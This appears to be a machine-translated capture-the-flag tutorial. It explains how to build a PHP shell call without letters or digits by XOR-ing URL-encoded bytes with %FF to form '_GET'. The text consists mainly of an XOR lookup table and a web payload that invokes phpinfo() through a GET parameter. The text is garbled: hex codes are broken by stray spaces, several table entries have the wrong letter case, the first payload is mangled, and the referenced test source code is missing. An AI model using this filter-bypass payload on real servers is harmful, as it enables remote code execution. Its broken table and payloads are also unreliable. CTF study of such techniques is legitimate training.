How to construct shell by bypassing characters and numbers in CTF
This article will explain in detail how CTF bypasses characters and numbers to construct shell. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.
Test source code
To run the script, we know
% 81 ^% FF = > ~% 82 ^% FF = >}% 83 ^% FF = > |
% 84 ^% FF = > {% 85 ^% FF = > z% 86 ^% FF = > y
% 87 ^% FF = > x% 88 ^% FF = > w% 89 ^% FF = > v
% 8A ^% FF = > u% 8B ^% FF = > t% 8C ^% FF = > s
% 8D ^% FF = > r% 8e ^% FF = > Q% 8F ^% FF = > p
% 90 ^% FF = > o% 91 ^% FF = > n% 92 ^% FF = > m
% 93 ^% FF = > l% 94 ^% FF = > k% 95 ^% FF = > j
% 96 ^% FF = > I% 97 ^% FF = > h% 98 ^% FF = > g
% 99 ^% FF = > f% 9A ^% FF = > e% 9B ^% FF = > d
% 9C ^% FF = > c% 9D ^% FF = > b% 9e ^% FF = > a
% 9F ^% FF = > `% A0 ^% FF = > _% A1 ^% FF = > ^
% A2 ^% FF = >]% A3 ^% FF = >\% A4 ^% FF = > [
% A5 ^% FF = > Z% A6 ^% FF = > Y% A7 ^% FF = > X
% A8 ^% FF = > W% A9 ^% FF = > V% AA ^% FF = > U
% AB ^% FF = > T% AC ^% FF = > S% AD ^% FF = > R
% AE ^% FF = > Q% AF ^% FF = > P% B0 ^% FF = > O
% B1 ^% FF = > N% B2 ^% FF = > M% B3 ^% FF = > L
% B4 ^% FF = > K% B5 ^% FF = > J% B6 ^% FF = > I
% B7 ^% FF = > H% B8 ^% FF = > G% B9 ^% FF = > F
% BA ^% FF = > E% BB ^% FF = > D% BC ^% FF = > C
% BD ^% FF = > B% be ^% FF = > A% BF ^% FF = > @
% C0 ^% FF = >?
Construct a phpinfo () function by this method
${% f% f ^% a0% b8% ba% ab} {% ff} (); &% ff=phpinfo
/ ${_ GET} {% ff} (); &% ff=phpinfo
We know that URL decoding is performed after a get pass, so we can encode the characters in url and then XOR to get the characters we want. % A0 ^% FF = > _
% B8 ^% FF = > G
% BA ^% FF = > E
% AB ^% FF = > T